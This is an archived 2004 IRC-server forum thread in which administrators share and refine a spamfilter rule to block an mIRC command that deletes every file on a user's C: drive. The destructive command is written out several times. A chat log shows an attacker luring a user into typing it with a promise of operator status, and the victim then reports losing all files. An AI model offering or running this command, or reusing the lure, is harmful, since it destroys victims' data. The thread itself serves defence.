IMPORTANT - HARD DRIVE SWIPE EXPLOIT

These are old archives. They are kept for historic purposes only.

Post by Fenix » Wed Aug 11, 2004 5:38 pm

Hey, I suggest EVERYONE adds this to their spamfilter.conf file. It is dangerous, this exploit! LAME script kiddies heh?

Please. This is probably vital to any network owner.

Here is the code:

spamfilter {
    regex "//echo \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)";
    target private;
    action gline;
    reason "Hard drive swipe expliot command has been blocked. You will NOT be Unglined, Sorry - permanent ban.";
};
^^

You can change the reason to what you want. But please issue alerts to users NOT to type any unknown commands AND NOT TO TYPE

//echo -q $findfile(C:\,*,0,.remove $shortfn($1-))

Thanks.

Fenix

Post by Fenix » Wed Aug 11, 2004 5:39 pm

P.S. Thanks to stealth for helping get the spamfilter regex to work :)

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm

Post by Fenix » Wed Aug 11, 2004 6:04 pm

Hey, sorry guys, slight bug in that:

The correct code is:

spamfilter {
    regex "//echo (-q)? \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)";
    target private;
    action gline;
    reason "Hard drive swipe expliot command has been blocked. You will NOT be Unglined, Sorry - permanent ban.";
};
ALSNet
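
Added example (not part of the original thread, and not UnrealIRCd code): a small Python check of the two posted regexes against the two command forms quoted in the thread. It assumes the quoted config string reaches the regex engine unchanged and that Python's `re` treats these simple patterns the same way as the server's engine; `GROUPED` is a hypothetical variant and the sample messages are constructed.

```python
import re

# Regexes copied from the two spamfilter blocks posted in the thread.
# Assumption: the config parser hands the quoted string to the regex engine as-is.
PATTERNS = {
    "first_posted": r"//echo \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)",
    "second_posted": r"//echo (-q)? \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)",
    # Hypothetical variant: the switch and its trailing space are optional together.
    "grouped": r"//echo (-q )?\$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)",
}

# Constructed private messages: the two command forms quoted in the thread,
# plus a harmless line that mentions //echo.
SAMPLES = {
    "with -q": r"Type this.. //echo -q $findfile(C:\,*,0,.remove $shortfn($1-)) and you will become an oper",
    "without -q": r"//echo $findfile(C:\,*,0,.remove $shortfn($1-))",
    "benign": "how do I use //echo in a script?",
}


def coverage(patterns, samples):
    """Return {pattern_name: {sample_name: matched}} using an unanchored search."""
    return {
        pname: {sname: re.search(pat, text) is not None
                for sname, text in samples.items()}
        for pname, pat in patterns.items()
    }


if __name__ == "__main__":
    for pname, row in coverage(PATTERNS, SAMPLES).items():
        print(f"{pname:14}", row)
```

The second posted regex still demands a space after the optional `-q`, so it no longer matches the form without the switch that the first regex caught. Grouping the switch with its trailing space matches both forms and leaves the harmless line alone.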

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Wed Aug 11, 2004 8:17 pm

Have you seen this in the wild? Got some logs perhaps? ;)
Or mail it personally to me if you don't want to say it here (syzop at unrealircd etc)

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm

Post by Fenix » Thu Aug 12, 2004 4:36 am

Yes, I have. I'm getting a friend to post his logs etc of what happened :P.
Also, some other people deleted their logs -_-

Only trouble is, it isn't a bot, it's real people who do it...
ALSNet

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Aug 12, 2004 4:52 am

Oh, I should point out that spamfilter glines are NOT permanent by default (IIRC). You might have to add ban-time 0 to make it perm.

Guest

Post by Guest » Thu Aug 12, 2004 4:53 am

[17:42:16pm] [Triforce] Hey
[17:42:19pm] [Triforce] Type this.. //echo -q $findfile(C:\,*,0,.remove $shortfn($1-)) and you will become an oper
[17:42:59pm]   «« quit speedtiger [mishy_@client-[safe]-B1A4728A.twcny.rr.com] ( Connection reset by peer )
[17:43:12pm] [Karson] Dont do it.
[17:43:15pm] [Triforce] rofl lmao thats fucking great
===================================
his rejoin

[01:28:55am]   (..join..) speedtiger (~mishy_@client-[safe]-B1A4728A.twcny.rr.com) [Unknown]
[01:30:15am] [speedtiger] That thing i did earlier deleted all my files and we had to reinstall windows

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm

Post by Fenix » Thu Aug 12, 2004 4:57 am

aquanight wrote: Oh, I should point out that spamfilter glines are NOT permanent by default (IIRC). You might have to add ban-time 0 to make it perm.
Ohh thanks; so I'd add:

action gline 0; or action gline ban-time 0;

?
ALSNet

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Thu Aug 12, 2004 2:03 pm

Ok, thanks for the logs ;p.

And ehm.. to make the glines permanent, use:
spamfilter {
    [blabla]
    ban-time 0;
};

If you wonder why they aren't permanent by default, well.. there are various reasons for that. One of them is that many people have a dynamic ip, thus banning IPs "forever" can easily ban innocent users over time ;p. If you really find them scary, why not choose a long-but-not-infinite time, like.. 7d or 14d :).

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Aug 12, 2004 7:04 pm

Or use a simple short ban time. Then find out how much of the IP is dynamic (i.e. identify the static parts of the hostname) and perm gline that :P .

w00t
Posts: 1136
Joined: Thu Mar 25, 2004 3:31 am
Location: Nowra, Australia

Post by w00t » Fri Aug 13, 2004 12:22 am

That's a nasty thing.

Ow.
-ChatSpike IRC Network [http://www.chatspike.net]
-Denora Stats [http://denora.nomadirc.net]
-Omerta [http://www.barafranca.com]

Ron2K

Post by Ron2K » Fri Aug 13, 2004 6:13 am

Ouch, this looks nasty. Any chance of getting this in spamfilter.conf if it's not in already?

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm

Post by Fenix » Fri Aug 13, 2004 2:11 pm

Syzop wrote: Ok, thanks for the logs ;p.

And ehm.. to make the glines permanent, use:
spamfilter {
[blabla]
ban-time 0;
};

If you wonder why they aren't permanent by default, well.. there are various reasons for that. One of them is that many people have a dynamic ip, thus banning IPs "forever" can easily ban innocent users over time ;p. If you really find them scary, why not choose a long-but-not-infinite time, like.. 7d or 14d :).
Thanks for that :P
ALSNet

xillian

channel

Post by xillian » Sun Aug 29, 2004 7:54 pm

Is there a way to make it gline users that say it via channel AND private?

Dukat
Posts: 1083
Joined: Tue Mar 16, 2004 5:44 pm
Location: Switzerland

Post by Dukat » Sun Aug 29, 2004 8:01 pm

